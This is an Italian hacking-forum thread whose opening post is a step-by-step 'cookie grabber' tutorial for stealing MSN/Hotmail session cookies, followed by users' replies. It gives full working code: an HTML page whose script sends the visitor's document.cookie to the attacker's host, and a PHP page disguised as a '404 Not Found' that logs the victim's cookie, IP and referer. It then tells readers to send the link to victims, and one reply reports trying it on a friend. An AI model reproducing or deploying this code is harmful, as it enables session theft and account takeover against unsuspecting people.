• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Cookie Grabber per msn...

Giuppe

Utente Esperto
Autore del topic
15 Gennaio 2008
1.144
0
Miglior risposta
0
Prima di iniziare vorrei dire che ne io e ne lo staff del forum sciax2 non ci assumiamo la responsabilità dell'ull'uso che gli utenti faranno di questomateriale!! Il materiale è stato postato da me solo a scopo informativo!

Cookie Grabber:

Innanzitutto i Cookies sono file che vengono depositati sulla vostra macchina da un server remoto e che permettono alla pagina che state visitando di riconoscervi in qualche ruolo. L'esempio che capirete al volo è il seguente:
Quando loggate su qualche sito e inserite la vostra password vi verrà richiesto, se ha abilitato setcookie, di salvare i dati. Questo non farà altro che creare un file sul vostro computer, quando tornerete su quella pagina il sito leggerà i vostri cookie e vi darà accesso automatico. Invece il Cookie Gabber è un "codice" composto da due file, uno file.html e uno file.php, il loro scopo è rubare i cookies della persona a cui vengono inviati.

Allora prima di iniziare abbiamo bisogno di un nostro spazio web (consiglio Altervista).
Adesso aprite il blocco note ed inserite il seguente codice:
<html>
<head>
<title>Titolo!</title>
</head>
<body>
<script>window.location="http://www.nostrosito.altervista.org/cookie.php?data=" + document.cookie</script>
</body>
</html>

Salvate il file con estensione (nome).html
Ora aprite nuovamente il blocco note ed inserite il seguente codice:
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<?php
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
<p>The requested URL was not found on this server.</p>
</body>
</html>

adesso salvate il file con estensione (nome).php (es: cookie.php)
il file.php serve per catturare i cookies della vittima... quest'ultimo costruisce una pagina web simile alla celebre "404" con l' aggiunta che ruba i cookies! Adesso non vi resta che uppare la pagina nel vostro spazio web ed inviare il link della pagina.html su hotmail, o nei forum, oppure mandate la vostra vittima direttamente su
Perfavore, Entra oppure Registrati per vedere i Link!
facendolo così arrivarete direttamente al Cookie Grabber!

Fonte:hackerdomination [CC]Diritti riservati[/CC]
 
Ultima modifica:
Si fungono al 101% l'ho provata su un mio amico mauahua xD:emoji_relieved:
 
Io non ho capito..dopo che la "vittima" và nella pagina che abbiamo hostato,i cookie dove arrivano?
 
Nella tua pagina Es.:
Perfavore, Entra oppure Registrati per vedere i Link!
o come lo vuoi chiamare te capito? se hai settato bene come c'è scritto nella guida!
 
Sisi..ora l'ho fatto ed effettivamente ci sono i cookie..Ma oltre l'indirizzo IP non vedo cos'èaltro potrebbe tornare eventualmente utile ad un cracker =)
 
xD:emoji_relieved: era solo per le psw di msn non per cracker io non mi assumo la responsabilità!
 
Veramente io password di msn non ne vedo...:emoji_alien:

E poi,i cracker possono usare l'indirizzo IP,che almeno nel cookie che ho preso,è presente ^__^
 
Utile per lamerazzi... anche se preferisco i cookie grabber sotto forma di exe :emoji_relieved:
 
e na volta che sai i cookie?? che fai.. entri nella pagina msn::? e se la pagina è scaduta.?? puoi vedere solo e-mail nn puoi vedere pasw se vuoi cambiarla devi saperla oppure domanda.. x mè è inutile
 
Raga Se Non VI Esce Nnt Vuoldire ke La Vittima Non A Utente e Pasw Salvato All'Accesso
Cmq Ora Non Sono Molto Utili Non Servono A Gran Ke..
 
AIUTO!

Ciao scusate ma nn capisco a me nn esce ntt..
solo cosi:

Cookie:
IP: **.**.***.***
Date and Time: 12 July, 2008, 10:07 pm
Referer:

E basta!
 
La solita merda fatta da persone che non hanno neanche la più pallida idea di cosa stiano parlando. Senza offesa.
Provate pure a dimostrare le vostre doti innate da h4x0r, chissenefrega se poi vi ritroverete in mano un pugno di mosce.